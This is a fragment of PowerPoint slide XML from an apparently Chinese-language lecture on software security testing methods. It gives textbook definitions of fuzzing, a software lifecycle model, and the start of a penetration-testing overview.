          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全测试方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模糊测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>渗透测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>静态源代码审核</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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模糊测试（Fuzzing）</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857250" y="1710690"/>
            <a:ext cx="10177145" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>什么是模糊测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>也称Fuzzing测试，一种通过提供非预期的输入并监视异常结果来发现软件故障的方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>黑盒测试，不关心被测试目标的内部实现，而是利用构造畸形的输入数据引发被测试目标产生异常，从而发现相应的安全漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2762250" y="4204970"/>
            <a:ext cx="6667500" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:rand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模糊测试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749300" y="1622425"/>
            <a:ext cx="8128000" cy="1337945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>强制软件程序使用恶意/破坏性的数据并进行观察结果的一种测试方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不够强壮的程序会崩溃</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码良好的程序正常运行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="876300" y="3867150"/>
            <a:ext cx="8128000" cy="2168525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>特性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方法学</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>随机值</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>大量测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查找漏洞或可靠性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>错误</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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模糊测试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841375" y="1524000"/>
            <a:ext cx="6096000" cy="2168525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模糊测试过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>生成大量的畸形数据作为测试用例；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将这些测试用例作为输入应用于被测对象；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>监测和记录由输入导致的任何崩溃或异常现象；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查看测试日志，深入分析产生崩溃或异常的原因；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3183255" y="3816350"/>
            <a:ext cx="5233035" cy="2621915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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软件生命周期模型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>增量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模型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99770" y="1265555"/>
            <a:ext cx="6096000" cy="1610995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>融合了瀑布模型和迭代模型的特征</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>本质上是迭代，每个增量发布一个可操作产品</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>适用场景：技术风险大，用户需求较为稳定的软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1347470" y="2581275"/>
            <a:ext cx="8777605" cy="3406775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="表格 3"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6096000" y="1809750"/>
          <a:ext cx="0" cy="0"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="0"/>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr marL="0" indent="0">
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1100" b="0" i="0">
                          <a:solidFill>
                            <a:srgbClr val="2153B0"/>
                          </a:solidFill>
                          <a:latin typeface="sans-serif"/>
                          <a:ea typeface="sans-serif"/>
                          <a:hlinkClick r:id="rId2" tooltip="技术风险"/>
                        </a:rPr>
                        <a:t>技术风险</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1100" b="0" i="0">
                          <a:solidFill>
                            <a:srgbClr val="333333"/>
                          </a:solidFill>
                          <a:latin typeface="sans-serif"/>
                          <a:ea typeface="sans-serif"/>
                        </a:rPr>
                        <a:t>较大、用户需求较为稳定的软件系统</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" b="0" i="0">
                        <a:solidFill>
                          <a:srgbClr val="333333"/>
                        </a:solidFill>
                        <a:latin typeface="sans-serif"/>
                        <a:ea typeface="sans-serif"/>
                        <a:hlinkClick r:id="rId2" tooltip="技术风险"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="26670" marR="26670" marT="26670" marB="26670" anchor="ctr" anchorCtr="0">
                    <a:lnL w="7620" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="7620" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="7620" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="7620" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="表格 6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6096000" y="1809750"/>
          <a:ext cx="0" cy="0"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="0"/>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr marL="0" indent="0">
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1100" b="0" i="0">
                          <a:solidFill>
                            <a:srgbClr val="2153B0"/>
                          </a:solidFill>
                          <a:latin typeface="sans-serif"/>
                          <a:ea typeface="sans-serif"/>
                          <a:hlinkClick r:id="rId2" tooltip="技术风险"/>
                        </a:rPr>
                        <a:t>技术风险</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1100" b="0" i="0">
                          <a:solidFill>
                            <a:srgbClr val="333333"/>
                          </a:solidFill>
                          <a:latin typeface="sans-serif"/>
                          <a:ea typeface="sans-serif"/>
                        </a:rPr>
                        <a:t>较大、用户需求较为稳定的软件系统</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" b="0" i="0">
                        <a:solidFill>
                          <a:srgbClr val="333333"/>
                        </a:solidFill>
                        <a:latin typeface="sans-serif"/>
                        <a:ea typeface="sans-serif"/>
                        <a:hlinkClick r:id="rId2" tooltip="技术风险"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="26670" marR="26670" marT="26670" marB="26670" anchor="ctr" anchorCtr="0">
                    <a:lnL w="7620" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="7620" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="7620" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="7620" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="表格 7"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6096000" y="1809750"/>
          <a:ext cx="0" cy="0"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="0"/>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr marL="0" indent="0">
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1100" b="0" i="0">
                          <a:solidFill>
                            <a:srgbClr val="2153B0"/>
                          </a:solidFill>
                          <a:latin typeface="sans-serif"/>
                          <a:ea typeface="sans-serif"/>
                          <a:hlinkClick r:id="rId2" tooltip="技术风险"/>
                        </a:rPr>
                        <a:t>技术风险</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1100" b="0" i="0">
                          <a:solidFill>
                            <a:srgbClr val="333333"/>
                          </a:solidFill>
                          <a:latin typeface="sans-serif"/>
                          <a:ea typeface="sans-serif"/>
                        </a:rPr>
                        <a:t>较大、用户需求较为稳定的软件系统</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" b="0" i="0">
                        <a:solidFill>
                          <a:srgbClr val="333333"/>
                        </a:solidFill>
                        <a:latin typeface="sans-serif"/>
                        <a:ea typeface="sans-serif"/>
                        <a:hlinkClick r:id="rId2" tooltip="技术风险"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="26670" marR="26670" marT="26670" marB="26670" anchor="ctr" anchorCtr="0">
                    <a:lnL w="7620" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="7620" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="7620" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="7620" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="AAAAAA"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:rand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影响模糊测试效果的关键因素</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475740" y="1803400"/>
            <a:ext cx="7950835" cy="383095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测试点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>数据通道入口、可信边界点、外界传入文件、rpc端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>样本选择</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>选择覆盖面广、便于测试的多个样本</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>数据关联性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>智能模糊测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自动化框架</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>异常监控与异常恢复</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>分析评估</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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渗透测试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721485"/>
            <a:ext cx="10741660" cy="341503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渗透测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过模拟恶意攻击者进行攻击，来评估系统安全的一种评估方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>从攻击的角度测试软件系统是否安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用自动化工具或者人工的方法模拟攻击者的输入，找出运行时刻目标系统所存在的安全漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>优点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
